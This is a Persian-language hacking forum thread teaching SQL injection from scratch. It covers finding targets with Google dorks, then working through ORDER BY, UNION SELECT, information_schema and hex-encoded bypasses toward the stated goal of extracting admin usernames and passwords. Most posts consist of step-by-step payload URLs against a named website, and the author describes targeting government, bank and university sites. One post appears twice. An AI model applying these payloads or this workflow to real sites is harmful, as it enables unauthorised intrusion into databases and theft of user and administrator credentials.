• توجه: در صورتی که از کاربران قدیمی ایران انجمن هستید و امکان ورود به سایت را ندارید، میتوانید با آیدی altin_admin@ در تلگرام تماس حاصل نمایید.

◄◄ آموزش جامع 0 تا 100 هک به وسیله sql ►►

wild.soldier

کاربر ويژه
سلام خدمت همه دوستان عزیز

از امروز فعالیت خودم را توی انجمن بزرگ iranjoman شروع می کنم
یه گشتی توی انجمن زدم دیدم آموزش کامل و جامع از sql وجود نداره
تصمیم گرفتم در این تایپیک


  • آموزش جامعی از sql
  • آموزش انواع متدها
  • آموزش انواع بایپس ها
  • برنامه های مورد نیاز + آموزش برنامه ها قرار بدم




امیدوارم مورد پسند دوستان قرار بگیره

قوانین:
برای یک دست بودن آموزش ها لطفا پیام ندید
اگر سوالی دارید می تونید تو قسمت پیام خصوصی بپرسید(در آینده بخشی برای پاسخ به سوالات ایجاد می کنیم)
برای تشکر کافیه دکمه تشکر را بزنید
128fs318181.gif


هماهنگ شده با admin




شروع آموزش از پست بعدی



 

wild.soldier

کاربر ويژه
توضيح كوتاه در مورد SQL INJECTION

توضيح كوتاه در مورد SQL INJECTION

همونطور که میدونید در اغلب برنامه های تحت وب از بانک اطلاعاتی استفاده میشه که اطلاعاتی نظیر اسامی ، اطلاعات کاربردی یک سایت ، اطلاعات کاربران و مدیران و ... در آن قرار میگیره .
این برنامه ها اطلاعاتی که کاربران میخواهند وارد کنند را از طریق کد هایی که برنامه نویس نوشته دریافت میکنند و بر اساس آنها Query جدیدی تعریف میکنند و به دیتابیس یا همون بانک اطلاعاتی ارسال میکنند . و ارتباط Database با کاربر از طریق همین Query ها برقرار میشود .
اکثر این برنامه ها از زبان SQL برای این ارتباط استفاده میکنند و جالبه که بدونید این فرایند که Query ها بر اساس اطلاعاتی که کاربران برای آنها تایین میکنند و مستقیماً در فیلدهای ورودی صفته وب وارد میکنند می تواند راهی برای نفوذ یک هکر باشد .
به عبارت دیگر اگر برنامه ای که توسط برنامه نویس نوشته شده ، اطلاعات یک فیلد رو که با همان دستورات کاربر وارد شده رو جلوی یک دستور SQL بگذارد و آن را برای اجرا کردن به بانک اطلاعاتی بفرستد در اینصورت یک هکر که با زبان SQL آشنا باشد می تواند محتویات این فیلدها را طوری با دستورات SQL پر کند که ممکن است به یک فرمان مخرب تبدیل شده و پس از اجرا ، اهداف نفوذگر را برآورده نماید .
و ما در این آموزشات میخواهیم همان دستورات و نحوه دستوپنجه نرم کردن با این برنامه های نوشته شده توسط برنامه نویسان رو مرور کنیم .
باگ ها SQL از طريق برنامه نويسي غلت و اشتباه برنامه نويس سايت اون باگ بوجود مياد و هكر ها هم از اين فرصت ها استفاده ميكنن و از طريق اون خرابي كه ما بهش ميگيم باگ اطلاعات سايت رو بدست ميارن و در اخر نفوذ و ...
ميتونم بگم روي تعداد زیادی از سايت هاي كه وجود داره باگ SQL موجود است ! مثلا بيشتر سايت هاي دولتي ما یا کشور های دیگر از این نوع باگ ها برخوردارن ! مثل : سايت هاي دانشگاها , سايت هاي بانك ها , سايت هاي دولتي , و ....
نوع ديتابيسي كه ما ميخوايم اموزش بديم :
در SQL ديتابس هاي زيادي هستند كه معروف ترين اين ها ميتونيم به MySQL , MsSQL , Orcal ا و ... اشاره كرد، در اين نوع ديتابس ها حملات تقربا شبيه به هم هستند (از نظر دستوري)
ما در اين تاپيك ميخوايم به آموزش حملات MySQL بپردازيم كه براي START خيلي خوبه ! يعني با دستورات بهتر اشنا ميشين مقدماتي تر نسبت به بقيه ساده تر هستش .
در ادامه با پیدا کردن سایت های آسیب پذیر و نحوه چک کردن سایت ها و ... آشنا میشید ...

موفق باشید .


 

wild.soldier

کاربر ويژه
پیدا کردن سایت باگ دار و تست نفوذ پذیری

پیدا کردن سایت باگ دار و تست نفوذ پذیری

خب.اولین قدم در هک به روش SQL INJECT پیدا کردن تارگت(قربانی)هستش.اولین سوالی که برای هرکس ایجاد میشه اینه که چطوری تارگت را پیدا کنیم.باید این نکته را بگم که اولا تمامی سایت ها این باگ را ندارند.ممکنه شما 10 تا سایت را بررسی کنید و فقط یکی این باگ را داشته باشه یا حتی ممکنه هر 10 تا این باگ را داشته باشن.پس اگر دیدید یه سایتی همچین باگی نداره ناامید نشید برید سراغ سایت های دیگه.
برای پیدا کردن سایت های آسیب پذیر ما باید از دورک ها استفاده کنیم.
اگر قرار باشه ما تک تک سایت های مختلف را تست کنیم و دنبال سایت آسیب پذیر باشیم به عمر نوح و صبر ایوب نیاز خواهیم داشت.برای همین ما از دورک ها استفاده می کنیم

برای مثال این یک نمونه دورک هستش که ما اونا توی موتور جستجو گوگل وارد می کنیم تا سایت هایی را برای ما نمایش بده

PHP:
 inurl:news-full.php?id=
در دستور بالا ما به موتور جستوجو گر فرمان میدیم که صفحه هایی از سایت هایی که در آدرس خودشون News.full.php?id رو دارند رو برای ما پیدا کنه .

بعد از پیدا کردن سایتی با فیلتر مورد نظرمون میرسیم به تست نفوذ پذیری !

برای این که بفهمیم سایت مورد نظر باگ SQL داره یا نه 2 روش وجود داره:

1 - روش اول روش کارکتری هستش
در این روش ما به آخر سایت مورد نظر علامت ' را اضافه می کنیم
برای مثال با اضافه کردن علامت ' به آخر سایت زیر متوجه میشیم که باگ sql داره
PHP:
http://www.acnc.com/content.php?id=14
PHP:
 http://www.acnc.com/content.php?id=14'

ما با 3 حالت روبه رو خواهیم شد.


  1. یا سایت ارور میده و می نویسه warning sql.....
  2. یا صفحه ناقص بالا میاد.مثلا سفید میاد یا نصف ه میاد
  3. یا صفحه بدون هیچ مشکلی بالا میاد


در 2 حالت اول ما باگ داریم و در حالت سوم باگ وجود نداره


2 - روش دوم روش منطقی هستش
در این روش ما به آخر آدرس صفحه مورد نظرمون AND 1=1 را اظافه میکنیم و با وارد کردن این دستور سایت باید به صورت کامل لود شود و با تغییر 1 دوم به 0 سایت اگر با نقص یا با ارور لود شود یعنی میتونیم کارمونو ادامه بدیم .

برای مثال
PHP:
 http://www.acnc.com/content.php?id=14+and+1=1--
سایت به صورت کامل لود شد
و بعد از تغییر 1 به 0

PHP:
http://www.acnc.com/content.php?id=14+and+1=0--

سایت ناقص لود شد که نشون میده باگ داره

در پست بعدی فیلم آموزشی این قسمت را قرار میدم


تشکر نشانه رضایت شماست
















 

wild.soldier

کاربر ويژه
فیلم آموزشی قسمت قبل

اینم فیلم آموزشی قسمت قبل:loveiranjoman:



برای امروز کافیه...ادامه برای فردا
 

پیوست ها

  • test nofoozpaziri.rar
    5 مگایابت · بازدیدها: 54

wild.soldier

کاربر ويژه
ادامه آموزش

ادامه آموزش
خب تا اینجای کار ما تارگت را پیدا کردیم و تست آسیب پذیری را انجام دادیم
در ادامه کار ما باید تعداد ستون ها-ستون های آسیب پذیر و ورژن تارگت را به دست بیاریم
برای پیدا کردن تعداد ستون ها از دستور order+by+x استفاده می کنیم
به جای x باید عدد قرار بدیم.به این صورت که ابتدا یک عدد را به صورت دلخواه قرار مدیم.مثلا 20
اگر سایت با ارور بالا اومد باید از مقدار آن کم شود.این کار تا جای انجام می شود که دیگر اروری نبینیم و صفحه به صورت کامل لود شود
برای مثال تارگت زیر را بررسی می کنیم
PHP:
 http://www.acnc.com/content.php?id=14

تعداد را 20 گرفتیم ارور داد پس از تعداد کم می کنیم
PHP:
 http://www.acnc.com/content.php?id=14+order+by+20--

تعداد را 17 گرفتیم باز هم ارور داد پس باز هم از تعدا دکم م کنیم
PHP:
 http://www.acnc.com/content.php?id=14+order+by+17--

تعداد را 16 گرفتیم و سایت به طور کامل بالا آمد پس تعدا ستون ها 16 تا است
PHP:
 http://www.acnc.com/content.php?id=14+order+by+16--

حالا باید با استفاده از دستور union+select+x ستون های آسیب پذیر را پیدا کنیم

x در این جا همان تعدا ستون ها است که از دستور قبلی پیدا کردیم.یعنی 16
پس دستور ما به ان صورت می شود
PHP:
 http://www.acnc.com/content.php?id=14+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--

خب با این که ما دستور را صحیح وارد کردیم ولی ستون های آسیب پذیر را نمایش نداد.در این گونه موارد ما به یک بایپس کوچیک نیاز داریم.باید قبل از عدد یک علامت - قرار بدیم.به این صورت
PHP:
 http://www.acnc.com/content.php?id=-14+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--

خب حالا روی صفحه عدد 4 و 12 را می بینیم که نشون میده ستون های 4 و 12 آسیب پذیر هستن.
از اینجای کار به بعد ما دستورات خودمون را به جای این 2 عدد قرار میدهیم
در مرحله بعد که به دست آوردن ورژن هست ما کلمه ()version را به جای عدد 4 قرار میدیم تا ورژن را استخراج کنیم
.به این صورت:
PHP:
 http://www.acnc.com/content.php?id=-14+union+select+1,2,3,version%28%29,5,6,7,8,9,10,11,12,13,14,15,16--

خب حالا روی صفحه عدد 5.1.37 را می بینیم که در واقع ورژن مورد نظر ماست

فیلم آموزشی این قسمت در پست بعدی قرار خواهد گرفت
























 

wild.soldier

کاربر ويژه
در قسمت های قبل سایتی رو که مشکل امنیتی مورد نظرمونو داشت پیدا و تست کردیم و دیدیم که میتونیم حملمونو ادامه بدیم در قدم بعد تعداد ستون های سایت رو بدست آوردیم و ستون هایی که به ما میتونستند کمک کنند را فراخوانی کردیم و از ستون های آزاد برای بدست آوردن اطلاعاتی همچون ورژن و نام دیتابیس و یوزر سایت استفاده کردیم در این قسمت از آموزش به بدست آوردن Table ها و بعد از آن به بدست آوردن Column های هر تیبل و موضوعات دیگر میپردازیم .
برای بدست آوردن Table ها و Column ها در ورژن 5 به بالا از دیتابیس information_schema اسفاده میکنیم به این صورت که بعد از استفاده از دستور union select و و استخراج ستون هایی که میتونستن به ما کمک کنند از دستور :

PHP:
+from+information_schema.X--
استفاده میکنیم که X متغیر است و به نسبت به درخواستمون اونو تغییر میدیم، (یه نکته رو هم بگم from به معنای از ، از روی ، بواسطه است ) در این جا ما نیاز به Table های سایت داریم که به جای X کلمه tables رو که یکی از تیبل های دیتابیس information_schema است را تایپ میکنیم یعنی شکل کلی به این صورت است :
PHP:
http://www.acnc.com/content.php?id=-14+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables--
با تزریق کد بالا سایت رو در حالت آماده باش برای استخراج تیبل ها قرار دادیم و فقط لازمه از سایت تیبل هارو درخواست کنیم. برای درخواست تیبل ها از سایت باید در یکی از ستون های که اعلام آمادگی کردند با دستور table_name تیبل هارو درخواست کنیم. شکل کلی دستور به صورت زیر است :
PHP:
http://www.acnc.com/content.php?id=-14+union+all+select+1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables--
با دستور بالا فقط یکی از تیبل های سایت را بدست می آوریم که امکان دارد تیبل مورد نظر ما نباشد و اطلاعاتی که ما به آن نیاز داریم را در اختیار ما قرار ندهد ! برای رفع این مشکل و بدست آوردن بقیه تیبل ها چندین راه وجود دارد که ما در این بحث به 3 روش متداول آن میپردازیم :

1. استفاده از دستور ()group_concat ا
2. استفاده از دستور limit و دستور offset ا
3. استفاده از دستور : like


. استفاده از دستور ()group_concat : راحت ترین راه استفاده از این دستور است که توسط آن کل اطلاعات در اختیار ما قرار میگیرد، در اینجا ما به تیبل ها نیاز داریم پس با استفاده از این دستور تمام تیبل هارا به ما نشان میدهد. شکل کلی دستور :

PHP:
http://www.acnc.com/content.php?id=-14+union+all+select+1,2,3,group_concat%28table_name%29,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables--
. استفاده از دستور limit و دستور offset : استفاده از این دستور شایn کمی وقت گیر باشد ولی در بعضی مواقع خیلی کمک میکند توسط این دستور شما اطلاعاتی که میخواید (در اینجا ما تیبل هارا میخوایم ولی میتونه اطلاعات چیزای دیگه ای هم باشه ...) را به صورت تکی به دست میارید یعنی اول تیبل اول بعد دوم بعد سوم و الی آخر ... .

نحوه استفاده از این دستور به شکل زیر است :

PHP:
http://www.acnc.com/content.php?id=-14+union+all+select+1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables+limit+1+offset+x--
در دستور بالا X متغیر است و باید X را از 0 شروع کرد و تک تک 0 را به 1 و بعد از بدست آوردن تیبل بعدی 1 را به 2 و الی آخر تیبل هارا بدست آورد تا به تیبل مورد نظر رسید. مثلا اگر شما به دنبال اطلاعات کاربران سایت هستید مانند یوزر و پسورد ادمین سایت باید به دنبال تیبلی به اسم User یا admin یا user_admin یا administrators یا کلماتی مشابه این ها باشید، معمولا در تیبلی که اطلاعات کاربران در آن ذخیره میشود کلمه user موجود است اگر سایتی را چک کردید و اصلا چیزی شبیه به اینا ندیدید احتمال داره یا تیبل مورد نظر در دیتابیس های دیگر باشد (یعنی سایت دارای چند دیتابیس از طرف مدیر باشد) یا اینکه اسم تیبل اسم عمومی نباشد مثلا اسمش باشه miomio .... ! برای همینم شاید کار یکم مشکل بشه و شما ناچار بشید تمام تیبل هارو چک کنید .

- - - - - - - - - - - - - - - - - - - - - - -

روش سوم را در پست بعدی قرار میدهم
 

wild.soldier

کاربر ويژه
در قسمت های قبل سایتی رو که مشکل امنیتی مورد نظرمونو داشت پیدا و تست کردیم و دیدیم که میتونیم حملمونو ادامه بدیم در قدم بعد تعداد ستون های سایت رو بدست آوردیم و ستون هایی که به ما میتونستند کمک کنند را فراخوانی کردیم و از ستون های آزاد برای بدست آوردن اطلاعاتی همچون ورژن و نام دیتابیس و یوزر سایت استفاده کردیم در این قسمت از آموزش به بدست آوردن Table ها و بعد از آن به بدست آوردن Column های هر تیبل و موضوعات دیگر میپردازیم .
برای بدست آوردن Table ها و Column ها در ورژن 5 به بالا از دیتابیس information_schema اسفاده میکنیم به این صورت که بعد از استفاده از دستور union select و و استخراج ستون هایی که میتونستن به ما کمک کنند از دستور :

PHP:
+from+information_schema.X--
استفاده میکنیم که X متغیر است و به نسبت به درخواستمون اونو تغییر میدیم، (یه نکته رو هم بگم from به معنای از ، از روی ، بواسطه است ) در این جا ما نیاز به Table های سایت داریم که به جای X کلمه tables رو که یکی از تیبل های دیتابیس information_schema است را تایپ میکنیم یعنی شکل کلی به این صورت است :
PHP:
http://www.acnc.com/content.php?id=-14+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables--
با تزریق کد بالا سایت رو در حالت آماده باش برای استخراج تیبل ها قرار دادیم و فقط لازمه از سایت تیبل هارو درخواست کنیم. برای درخواست تیبل ها از سایت باید در یکی از ستون های که اعلام آمادگی کردند با دستور table_name تیبل هارو درخواست کنیم. شکل کلی دستور به صورت زیر است :
PHP:
http://www.acnc.com/content.php?id=-14+union+all+select+1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables--
با دستور بالا فقط یکی از تیبل های سایت را بدست می آوریم که امکان دارد تیبل مورد نظر ما نباشد و اطلاعاتی که ما به آن نیاز داریم را در اختیار ما قرار ندهد ! برای رفع این مشکل و بدست آوردن بقیه تیبل ها چندین راه وجود دارد که ما در این بحث به 3 روش متداول آن میپردازیم :

1. استفاده از دستور ()group_concat ا
2. استفاده از دستور limit و دستور offset ا
3. استفاده از دستور : like


. استفاده از دستور ()group_concat : راحت ترین راه استفاده از این دستور است که توسط آن کل اطلاعات در اختیار ما قرار میگیرد، در اینجا ما به تیبل ها نیاز داریم پس با استفاده از این دستور تمام تیبل هارا به ما نشان میدهد. شکل کلی دستور :

PHP:
http://www.acnc.com/content.php?id=-14+union+all+select+1,2,3,group_concat%28table_name%29,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables--
. استفاده از دستور limit و دستور offset : استفاده از این دستور شایn کمی وقت گیر باشد ولی در بعضی مواقع خیلی کمک میکند توسط این دستور شما اطلاعاتی که میخواید (در اینجا ما تیبل هارا میخوایم ولی میتونه اطلاعات چیزای دیگه ای هم باشه ...) را به صورت تکی به دست میارید یعنی اول تیبل اول بعد دوم بعد سوم و الی آخر ... .

نحوه استفاده از این دستور به شکل زیر است :

PHP:
http://www.acnc.com/content.php?id=-14+union+all+select+1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables+limit+1+offset+x--
در دستور بالا X متغیر است و باید X را از 0 شروع کرد و تک تک 0 را به 1 و بعد از بدست آوردن تیبل بعدی 1 را به 2 و الی آخر تیبل هارا بدست آورد تا به تیبل مورد نظر رسید. مثلا اگر شما به دنبال اطلاعات کاربران سایت هستید مانند یوزر و پسورد ادمین سایت باید به دنبال تیبلی به اسم User یا admin یا user_admin یا administrators یا کلماتی مشابه این ها باشید، معمولا در تیبلی که اطلاعات کاربران در آن ذخیره میشود کلمه user موجود است اگر سایتی را چک کردید و اصلا چیزی شبیه به اینا ندیدید احتمال داره یا تیبل مورد نظر در دیتابیس های دیگر باشد (یعنی سایت دارای چند دیتابیس از طرف مدیر باشد) یا اینکه اسم تیبل اسم عمومی نباشد مثلا اسمش باشه miomio .... ! برای همینم شاید کار یکم مشکل بشه و شما ناچار بشید تمام تیبل هارو چک کنید .

- - - - - - - - - - - - - - - - - - - - - - -

روش سوم را در پست بعدی قرار میدهم
 

wild.soldier

کاربر ويژه
ادامه پست قبلی ...

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

3. استفاده از دستور like : با استفاده از دستور like کار شما خیلی راحت میشه و به سادگی میتونید تیبل مورد نظرتونو پیدا کنید، نحوه کار این روش اینطوریه که ما میدونیم که اطلاعات کاربران معمولا در تیبل هایی با اسم های مشخص هستند مانند user یا admin و یا ... و شایدم همین کلمات عمومی فقط با کمی تغییر مثلا شده باشه phpuser یا مثلا admin_panel یا member_list یا ... ، این روش با ما این امکان رو میده که ما بگیم دنبال تیبلی هستم که در آن مثلا user به کار رفته باشد حالا فرقی نمیکه اولش چیزی اضافه شده باشه یا آخرش .

شکل دستوری آنرا قرار میدم و قسمت به قسمت دستور رو توضیح میدم :

PHP:
http://www.acnc.com/content.php?id=-14+union+all+select+1,2,3,group_concat%28table_name%29,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables+where+table_name+like+%27%user%%27--
. در دستور بالا همانظور که مشاهده میکنید در ستونی که Table_name را قرار دادیم ()group_concat را هم اضافه کردیم این به این معناست که همه تیبل هایی که مثلا کلمه admin در قسمتی از اسم آنها وجود دارد را به ما نشان بده .
2. بعد از information_schema کلمه where را اضافه کردیم که به معنای "کجا" یا "در کجا" است .
3. بعد از کلمه where تایپ کردیم table_name یعنی بین تیبل ها بگرد .
4. بعد کلمه like که به معنای مانند است را وارد کردیم که دستور اصلی این روش است .
5. بعد از like یک کوتیشن ( ' ) و بعد از کوتیشن یک علامت درصد ( % ) و پس از آن کلمه ای که میخوایم میون اسم های تیبل ها به دنبال آن بگردیم مثلا user و مجددا علامت درصد و بعد از آن هم یک کوتیشن دیگر و دستور به پایان میرسد . در این دستور کوتیشن به معنای تاکید است و درصد معنای آزاد بودن کلمه از هر دو طرف است یعنی اگر به user کلمه یا حروفی از قبل یا بعد از آن اضافه شده باشد هم به ما نشان بده اگر ما درصد ها را وارد نکنیم فقط به دنبال کلمه user میگردد و اگر کلمه ای به اسم cpuser وجود داشت را به ما نشان نمیدهد !

 

wild.soldier

کاربر ويژه
ادامه آموزش

در آموزش قبل با چند روش برای بدست آوردن تیبل های سایت آشنا شدیم در این قسمت با بدست آوردن Column های دیتابیس آشنا میشیم .

براي بدست اوردن Column ها روش كار مانند روش بدست آوردن Table ها است، اگر درس قبل را خوب متوجه شده باشید برای بدست آوردن Column ها هم مشکلی نخواهید داشت .

در آموزش قبل خوانديم كه ميتوانيم به چندين روش تيبل ها را استخراج کنیم؛ در اين درس همان كار هارا تكرار ميكنيم ولي با اين فرق كه جاي Table ها را با Column تغيير ميديم که کار

واقعا ساده ای است .

طبق درس قبل شکل ساده بدست آوردن Column ها هم مانند Table ها است .

ابتدا سایت را برای بدست آوردن ستون ها یا همان Column ها آماده میکنیم :

PHP:
http://www.acnc.com/content.php?id=-14+union+all+select+1,2,3,4,5,6+from+information_schema.columns--
در ادامه یکی از ستون های آزاد سایت را انتخاب کرده و از دیتابس Column هارا درخاست میکنیم، برای درخواست کالومن ها از دستور Column_name استفاده میکنیم :
PHP:
www.acnc.com/content.php?id=-14+union+all+select+1,2,column_name,4,5,6+from+information_schema.columns--
ما به دنبال کالومن های تیبل مورد نظر هستیم ولی با این دستور کالومن های تیبلی که مد نظر داریم را نمیتوانیم بدست آوریم، برای بدست آوردن کالومن های تیبل مورد نظر باید از دستور زیر استفاده کنیم :
PHP:
www.acnc.com/content.php?id=-14+union+all+select+1,2,3,group_concat(Column_name),5,6+from+information_schema.columns+where+table_name=esme table ramzi shode--

نکته : در قسمتی که نوشته شده "esme table ramzi shode" باید اسم تیبل مورد نظر که در اینجا ما به دنبال یوزر و پسورد ادمین سایت هستیم باید اسم تیبلی که اطلاعات کاربران و مدیران در آن قرار گرفته را قبلا پیدا کرده باشیم و آنرا در اینجا به صورت کد شده (Hex , Char , ...) قرار بدیم .

نكته : and+1=0 رو كه قبل از union قرار دادم به این معناست که میخوایم از ارور اطلاعات را بكشيم بيرون , يه نوع باي پس است که در همه سايت ها احتیاجی نيست این دستور را هم وارد کنید، ولی اگر وارد کنید بهتر است . برای اطمینان .

بعضی دوستان در پیغام های که به من میدند هنوز با Hex و Char و کلا رمزی کردن متن آشنا نیستند و دلیل اینکار را نمیدانند، یه توضیح خیلی ساده میدم که مشکلی دیگه در این زمینه نباشه، بعضی سایت ها دارای Magic Quote هستند که Magic Quote کار یک فایروال یا آنتی ویروس را انجام میده و زمانی که شما میخواید کاری کنید Magic Quote مطلع میشه و جلوی شما را میگیرد و ما برای دور زدن یا همان Baypass کردن این مزاحم از بعضی از روش ها استفاده میکنیم که در جاهای مخلف کار برد دارند و یکی از این روش ها رمزی کردن متن ها است ...

خوب در ادامه آموزش میرسیم به بدست آوردن کالومن های این سایت که دستور آن را در اول بحث بررسی کردیم، هانطور که در درس قبل تیبلی که اطلاعات کاربران از جمله مدیریت در آن قرار دارد را پیدا کردیم که اسم آن user بود .

حالا با توضیحاتی که دادیم user را Hex میکنیم که به این شکل میشود : 0x75736572 و دستور را تزریق میکنیم :

PHP:
http://www.acnc.com/content.php?id=-14+union+all+select+1,2,3,group_concat%28Column_name%29,5,6+from+information_schema.columns+where+table_name=0x75736572--

با تزریق کد بالا حالا ما هم تیبل مورد نظر را داریم هم کالومن ها تا اینجا 90% راه را رفتیم برای بدست آوردن اطلاعات مدیر سایت تنها کاری که مانده بدست آوردن یوزر و پسورد ادمین سایت است که در درس بعدی به آن میپردازیم ...

امید وارم آموزشات مفید واقع شده باشد، موفق باشید ...
:احترام:
 

wild.soldier

کاربر ويژه
برنامه مورد نیاز

سلام به همگی

تو پست قبلی گفتیم که باید اسم تیبل ادمن را که در واقع همون user بود را به هگز تبدل کنیم که میشد 0x75736572 .
در این پست برنامه ای که با اون این کارا انجام میدیم براتون قرار می دم که می تونید برای تبدیل تکس به هگز ازش استفاده کنید


:بای:


 

پیوست ها

  • TEXT2HEX.rar
    169.9 کیلوبایت · بازدیدها: 22
بالا